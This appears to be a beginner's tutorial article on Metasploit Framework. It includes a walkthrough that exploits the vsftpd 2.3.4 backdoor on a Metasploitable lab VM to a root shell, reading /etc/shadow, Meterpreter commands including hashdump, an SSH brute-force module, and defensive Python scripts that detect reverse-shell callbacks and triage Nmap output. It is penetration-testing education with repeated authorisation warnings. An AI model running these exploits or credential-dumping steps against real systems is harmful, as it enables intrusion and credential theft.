
Metasploit Framework: Penetration Testing for Beginners

Only use Metasploit against systems you own or have explicit written permission to test. Running exploits against unauthorised targets is a criminal offence in most jurisdictions — including under Australia’s Criminal Code Act 1995 (Part 10.7) and the Computer Fraud and Abuse Act (CFAA) in the United States. Every command on this page assumes you are working in your own home lab or an authorised practice environment.

Even in a professional penetration testing engagement, exploiting systems requires a signed scope agreement (Rules of Engagement) before you touch a single target. Treat this as a non-negotiable rule from day one.

What Is Metasploit and Why Does It Matter?


Metasploit Framework is the world’s most widely used open-source penetration testing platform, maintained by Rapid7. According to Rapid7’s official documentation, it contains over 2,300 verified exploits and 3,500+ modules for security testing. NIST SP 800-115 references exploitation frameworks as essential tools for technical security assessment.

Metasploit Framework is a free, open-source penetration testing platform that provides the infrastructure for developing, testing, and executing exploit code against remote targets. Originally created by HD Moore in 2003 and now maintained by Rapid7, it has become the de facto standard for penetration testers, security researchers, and red team operators.

Think of Metasploit as a structured workshop for penetration testing. Instead of writing exploits from scratch, you select pre-built modules, configure them for your target, and execute them in a controlled, repeatable way. It handles the complex low-level details — shellcode generation, payload encoding, session management — so you can focus on understanding the vulnerability and its impact.

I will be completely honest — the first time I ran an exploit in Metasploit and got a Meterpreter shell on my Metasploitable VM, I felt equal parts excited and terrified. Excited because I had just done something that would have seemed like movie hacking six months ago. Terrified because it was so easy. Three commands and I had complete control of a remote system. That is when I truly understood why patching matters, why vulnerability management exists, and why organisations spend millions on security. If a career changer studying in her Sydney flat can do this with a free tool, imagine what a motivated attacker can do.

Metasploit’s architecture is modular. Everything is organised into categories that serve specific purposes in the penetration testing workflow.

Module Type | Purpose | Example
Exploits | Code that takes advantage of a specific vulnerability | exploit/unix/ftp/vsftpd_234_backdoor
Payloads | Code that runs on the target after successful exploitation | windows/meterpreter/reverse_tcp
Auxiliary | Scanning, fuzzing, and information gathering tools | auxiliary/scanner/portscan/tcp
Post | Post-exploitation modules for pivoting, privilege escalation, and data gathering | post/windows/gather/hashdump
Encoders | Obfuscate payloads to evade detection | x86/shikata_ga_nai
Nops | Generate no-operation instructions for padding | Used internally by exploit modules

Rapid7 ships Metasploit in several editions; the differences that matter for a beginner are summarised below. (Rapid7 retired the Community edition in 2019, so in practice the choice today is between Framework and Pro.)

Feature | Framework (Free) | Community (Free, Limited) | Pro (~$15,000/year)
Exploits and modules | Full access | Full access | Full access
Command line (msfconsole) | Yes | Yes | Yes
Web interface | No | Basic | Full
Automated exploitation | Manual | Limited | Full
Reporting | Manual | Basic | Professional reports
Social engineering | Manual | No | Integrated

For learning, Metasploit Framework is all you need. It comes pre-installed on Kali Linux and is the version used in the OSCP exam and most training courses.

Metasploit Penetration Testing Workflow

The five stages of using Metasploit in a security assessment:

  • Stage 1, Reconnaissance: Nmap scan for open ports; identify services and versions; import results into Metasploit.
  • Stage 2, Select Exploit: search for matching exploits; review exploit details and reliability; set target and options.
  • Stage 3, Configure Payload: choose payload type; set LHOST and LPORT; configure encoding if needed.
  • Stage 4, Exploit: execute the exploit; obtain a shell or Meterpreter session; verify access level.
  • Stage 5, Post-Exploitation: gather system information; escalate privileges; document findings for the report.

msfconsole is the primary command-line interface for Metasploit Framework. It is where you will spend most of your time.

Terminal window
# On Kali Linux, Metasploit is pre-installed
# Start the database first (for storing scan results)
sudo msfdb init
# Launch msfconsole
msfconsole

The first launch may take a minute while it loads all modules. You will see the Metasploit banner and the msf6 > prompt.

Terminal window
# Search for exploits by keyword
msf6 > search vsftpd
msf6 > search type:exploit platform:windows smb
# Get information about a module
msf6 > info exploit/unix/ftp/vsftpd_234_backdoor
# Select a module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
# Show required options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
# Set target IP
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
# Set your attacking machine IP
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LHOST 192.168.56.1
# Run the exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

The options you will set most often:

Option | Meaning | Example
RHOSTS | Remote host: the target IP address | 192.168.56.101
RPORT | Remote port: the target port | 21 (usually set automatically)
LHOST | Local host: your attacking machine IP | 192.168.56.1
LPORT | Local port: the port on your machine that receives the reverse connection | 4444 (default)
PAYLOAD | The code to run on the target after exploitation | cmd/unix/interact

Meterpreter is Metasploit’s most powerful payload — an advanced, dynamically extensible shell that runs entirely in memory on the target system. According to Rapid7’s documentation, Meterpreter provides capabilities including file system access, process manipulation, network pivoting, screenshot capture, and keylogging.

Meterpreter is not just a command prompt. It is a full-featured post-exploitation platform:

Terminal window
# Once you have a Meterpreter session:
meterpreter > sysinfo # System information
meterpreter > getuid # Current user context
meterpreter > pwd # Current directory on target
meterpreter > ls # List files
meterpreter > download secret.txt # Download files from target
meterpreter > upload tool.exe # Upload files to target
meterpreter > hashdump # Dump password hashes (requires SYSTEM)
meterpreter > screenshot # Capture screenshot
meterpreter > shell # Drop to a standard system shell
meterpreter > background # Background the session

Why Meterpreter matters for learning: It shows you exactly what an attacker can do after gaining access. Every command you run in Meterpreter represents a real post-exploitation technique. Understanding these capabilities helps you appreciate why prevention, detection, and incident response all matter.
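What a defender sees on the wire, as an added example that is not part of the original article or of Metasploit itself: the reverse_tcp payloads discussed above make the target open an outbound TCP connection back to LHOST on LPORT (4444 by default, per the options table). A server that suddenly initiates an outbound session to an unexpected high port is a cheap indicator worth alerting on. The Python below runs that check over a few constructed firewall log lines; the key=value log format, the field names (dir, proto, src, dst, dport), the server subnet and the allowlisted egress ports are all assumptions made for the example.

```python
"""Flag likely reverse-shell callbacks in firewall connection logs.

Added example, not from the original article or from Metasploit itself.
A reverse_tcp payload makes the compromised host open an outbound TCP
connection to LHOST:LPORT (4444 unless changed), so "server initiates an
outbound session to an unexpected port" is a cheap network indicator.
The log format, field names and subnets below are constructed.
"""
import ipaddress
import re

# Constructed: subnet holding servers that should not initiate outbound sessions.
SERVER_NETS = [ipaddress.ip_network("192.168.56.0/24")]

# Metasploit's default LPORT (from the options table); extend with your own defaults.
DEFAULT_CALLBACK_PORTS = {4444}

# Constructed egress allowlist: ports servers here legitimately reach out on.
ALLOWED_DPORTS = {53, 80, 123, 443}

LOG_FIELD = re.compile(r"(?P<key>\w+)=(?P<val>\S+)")


def parse_line(line):
    """Turn one 'key=value key=value' log line into a dict."""
    return {m.group("key"): m.group("val") for m in LOG_FIELD.finditer(line)}


def in_server_net(ip):
    """True when ip falls inside one of the constructed server subnets."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in SERVER_NETS)


def classify(rec):
    """Return (severity, reason) for one record; severity is None when benign."""
    if rec.get("proto") != "tcp" or rec.get("dir") != "outbound":
        return None, ""
    if not in_server_net(rec.get("src", "")):
        return None, ""
    dport = int(rec.get("dport", "0"))
    if dport in DEFAULT_CALLBACK_PORTS:
        return "high", f"server-initiated TCP to default Metasploit LPORT {dport}"
    if dport not in ALLOWED_DPORTS:
        return "medium", f"server-initiated TCP to unexpected port {dport}"
    return None, ""


def scan_log(lines):
    """Run classify() over every line; return the alerts in log order."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        severity, reason = classify(rec)
        if severity:
            alerts.append({
                "severity": severity,
                "src": rec["src"],
                "dst": rec.get("dst", "?"),
                "dport": int(rec["dport"]),
                "reason": reason,
            })
    return alerts


# Constructed sample: the second line is the shape a default reverse_tcp callback leaves.
SAMPLE_LOG = [
    "ts=2026-03-10T10:00:01Z dir=inbound proto=tcp src=192.168.56.1 dst=192.168.56.101 dport=21 action=allow",
    "ts=2026-03-10T10:00:02Z dir=outbound proto=tcp src=192.168.56.101 dst=192.168.56.1 dport=4444 action=allow",
    "ts=2026-03-10T10:00:03Z dir=outbound proto=udp src=192.168.56.101 dst=192.168.56.2 dport=53 action=allow",
    "ts=2026-03-10T10:00:04Z dir=outbound proto=tcp src=192.168.56.101 dst=203.0.113.10 dport=8443 action=allow",
    "ts=2026-03-10T10:00:05Z dir=outbound proto=tcp src=10.0.0.5 dst=192.168.56.1 dport=4444 action=allow",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['src']} -> {alert['dst']}:{alert['dport']}  {alert['reason']}")
```

The 4444 match is only high-confidence against defaults; a tester who sets LPORT to 443 lands in the medium tier at best, and only if 443 is not on the egress allowlist. Treat this as one signal to correlate with host-side evidence (a network service spawning an unexpected child process, for instance) rather than a detection on its own.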

Step-by-Step: Your First Exploit (Metasploitable)


This walkthrough uses the Metasploitable 2 VM — a deliberately vulnerable Linux image maintained by Rapid7 for training purposes. It should only be run in an isolated home lab environment.

Terminal window
# From your Kali VM
nmap -sV 192.168.56.101

You will see vsftpd 2.3.4 on port 21. This version has a well-known backdoor vulnerability (CVE-2011-2523).

Terminal window
msf6 > search vsftpd
# Output:
# exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent

Terminal window
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
# Output:
# [*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
# [*] 192.168.56.101:21 - USER: 331 Please specify the password.
# [+] 192.168.56.101:21 - Backdoor service has been spawned
# [+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
# [*] Command shell session 1 opened

Terminal window
# You now have a root shell on the target
whoami
# root
hostname
# metasploitable
cat /etc/shadow
# (password hashes visible — demonstrates the severity of root access)

In a real assessment, you would document:

  • The vulnerability exploited (vsftpd 2.3.4 backdoor, CVE-2011-2523)
  • The level of access obtained (root)
  • Evidence (screenshots, command output)
  • Remediation recommendation (upgrade vsftpd, remove backdoored version)

Then exit cleanly and end the session.

Auxiliary modules handle tasks beyond exploitation — scanning, enumeration, and information gathering.

Terminal window
# Port scanning
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.56.0/24
msf6 auxiliary(scanner/portscan/tcp) > run
# SMB version detection
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.56.101
msf6 auxiliary(scanner/smb/smb_version) > run
# SSH brute force (against your own lab only!)
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.101
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run

Metasploit integrates directly with Nmap. You can import scan results to avoid rescanning:

Terminal window
# Run Nmap from within msfconsole
msf6 > db_nmap -sV -sC 192.168.56.101
# Or import a saved Nmap XML file
msf6 > db_import /path/to/scan.xml
# View discovered hosts and services
msf6 > hosts
msf6 > services
msf6 > vulns
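The Nmap results are also what drive the patch-priority list, which is the part of the workflow that survives whether or not exploitation is in scope. As an added example (not code from the article or from Metasploit), here is a Python triage script that reads the same Nmap XML that db_import consumes, pulls out each open port's product and version, and matches them against a watchlist of known-vulnerable versions, using the vsftpd 2.3.4 / CVE-2011-2523 pairing from this article. The sample XML is constructed and trimmed to the elements the parser reads; the watchlist contents and the remediation wording are assumptions you would replace with your own vulnerability feed.

```python
"""Triage an Nmap -sV XML report for known-vulnerable service versions.

Added example, not from the original article or from Metasploit. It reads
the same Nmap XML that `db_import` consumes and produces the remediation
lines for the report without touching the target. The sample XML is
constructed and trimmed; the watchlist contents are assumptions.
"""
import xml.etree.ElementTree as ET

# Constructed watchlist keyed on (product, version) exactly as Nmap reports them.
# The one entry is the pairing this article discusses; feed the rest from
# your own vulnerability sources.
WATCHLIST = {
    ("vsftpd", "2.3.4"): (
        "CVE-2011-2523",
        "Upgrade vsftpd and remove the backdoored 2.3.4 build",
    ),
}

# Constructed sample in the shape of `nmap -sV -oX scan.xml` output (trimmed).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.56.101">
  <host>
    <status state="up"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed"/>
        <service name="telnet"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_services(xml_text):
    """Return one dict per open port: host, port, proto, name, product, version."""
    root = ET.fromstring(xml_text)
    services = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue  # skip hosts with no IPv4 address element
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports carry no service version
            svc = port.find("service")
            get = svc.get if svc is not None else (lambda k, d="": d)
            services.append({
                "host": addr.get("addr"),
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": get("name", ""),
                "product": get("product", ""),
                "version": get("version", ""),
            })
    return services


def find_known_vulnerable(services, watchlist=WATCHLIST):
    """Exact (product, version) match against the watchlist; returns findings."""
    findings = []
    for svc in services:
        key = (svc["product"], svc["version"])
        if key in watchlist:
            cve, remediation = watchlist[key]
            findings.append({**svc, "cve": cve, "remediation": remediation})
    return findings


def report_lines(findings):
    """Format findings the way the article's 'document' step lists them."""
    return [
        f"{f['host']}:{f['port']}/{f['proto']} {f['product']} {f['version']} "
        f"({f['cve']}) -> {f['remediation']}"
        for f in findings
    ]


if __name__ == "__main__":
    found = find_known_vulnerable(parse_services(SAMPLE_NMAP_XML))
    print("\n".join(report_lines(found)) or "no watchlisted versions found")
```

The match is deliberately exact on (product, version): Nmap version strings often carry distribution suffixes (the OpenSSH entry in the sample shows the pattern), so a production version would normalise those before comparing. What the script gives you is the remediation line for the report (service, version, CVE, fix) from scan data alone.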

Metasploit is covered by the PenTest+ exam objectives and used extensively in the OSCP exam. The study tracker helps you map each module type to lab exercises so you build hands-on experience systematically.


What Are the Limitations and Ethical Boundaries?


Metasploit is an exploitation tool. Its entire purpose is to compromise systems. This power comes with serious ethical and legal responsibilities.

Legal boundaries are absolute. Running any exploit module against a system without explicit written authorisation is a criminal offence. In Australia, the Criminal Code Act 1995 carries penalties of up to 10 years imprisonment for unauthorised access to computer systems. Similar laws exist in every jurisdiction worldwide.

Metasploit is not a vulnerability scanner. It exploits known vulnerabilities rather than discovering new ones. Use Nmap and vulnerability scanners (Nessus, OpenVAS) for discovery, then use Metasploit to validate that vulnerabilities are actually exploitable.

Antivirus and EDR will detect Metasploit payloads. Default Metasploit payloads are well-known to security products. In real engagements, testers use custom payloads and evasion techniques. For lab practice, this is not a concern.

Not all exploits are reliable. Module reliability ratings (excellent, great, good, normal, low, manual) indicate how likely the exploit is to work without crashing the target. In a real assessment, crashing a production system is a serious incident. Always check the reliability rating.

  • Metasploit Framework is the industry-standard open-source penetration testing platform — free, pre-installed on Kali Linux, and used by professional penetration testers worldwide.
  • The framework is modular — exploits, payloads, auxiliary modules, and post-exploitation tools each serve a specific purpose in the testing workflow.
  • msfconsole is the primary interface. Learn the core commands: search, use, set, show options, and exploit.
  • Meterpreter is the most powerful payload — providing full post-exploitation capabilities including file access, process control, and privilege escalation.
  • Legal authorisation is non-negotiable. Only use Metasploit against systems you own or have explicit written permission to test.
  • Start with Metasploitable in your home lab. It is specifically designed for learning Metasploit safely.
  • Metasploit validates vulnerabilities — it does not discover them. Pair it with Nmap and vulnerability scanners for a complete assessment workflow.

Legal reminder: Exploiting systems without authorisation is a criminal offence in most jurisdictions. All commands on this page assume you are working in your own home lab or an authorised practice environment.


Technical details verified in March 2026 against Rapid7’s official Metasploit documentation (docs.metasploit.com), NIST SP 800-115, and CompTIA PenTest+ PT0-002 exam objectives.

Frequently Asked Questions

Is Metasploit legal to use?

Metasploit Framework itself is legal to download, install, and use. However, running exploits against systems you do not own or do not have explicit written authorisation to test is illegal in most jurisdictions. In Australia, unauthorised access carries penalties under the Criminal Code Act 1995. Always test only in your own lab or with written permission.

Is Metasploit free?

Metasploit Framework is free and open-source. It comes pre-installed on Kali Linux. Rapid7 also offers Metasploit Pro (approximately $15,000/year) with additional automation, reporting, and web interface features. For learning, the free Framework is all you need.

What is the difference between an exploit and a payload?

An exploit is code that takes advantage of a specific vulnerability to gain access to a target system. A payload is code that runs on the target after the exploit succeeds, giving you capabilities like a command shell or Meterpreter session. You choose both when configuring an attack in Metasploit.

What is Meterpreter?

Meterpreter is Metasploit’s most advanced payload — an extensible shell that runs in memory on the target system. It provides capabilities including file system access, process control, screenshot capture, password hash dumping, and network pivoting, all without writing files to disk on the target.

Do I need to know programming to use Metasploit?

No programming knowledge is needed to use existing Metasploit modules. You interact through msfconsole using simple commands like search, use, set, and exploit. However, understanding Python and Ruby becomes valuable if you want to write custom modules or modify existing ones.

What certifications test Metasploit knowledge?

CompTIA PenTest+ (PT0-002) covers exploitation frameworks including Metasploit. The OffSec OSCP certification relies heavily on Metasploit skills (with a limit of one use during the exam). CEH (Certified Ethical Hacker) also covers Metasploit as a core tool.

What is the best practice target for Metasploit?

Metasploitable 2, maintained by Rapid7, is the most widely recommended practice target. It is a deliberately vulnerable Linux VM with dozens of exploitable services. Run it in VirtualBox on an isolated host-only network alongside Kali Linux.

Can antivirus detect Metasploit payloads?

Yes, most modern antivirus and endpoint detection and response (EDR) solutions detect default Metasploit payloads. The payloads are well-known and signatured. In professional engagements, testers use custom payloads and evasion techniques. For lab practice, this is not a concern since Metasploitable has no AV installed.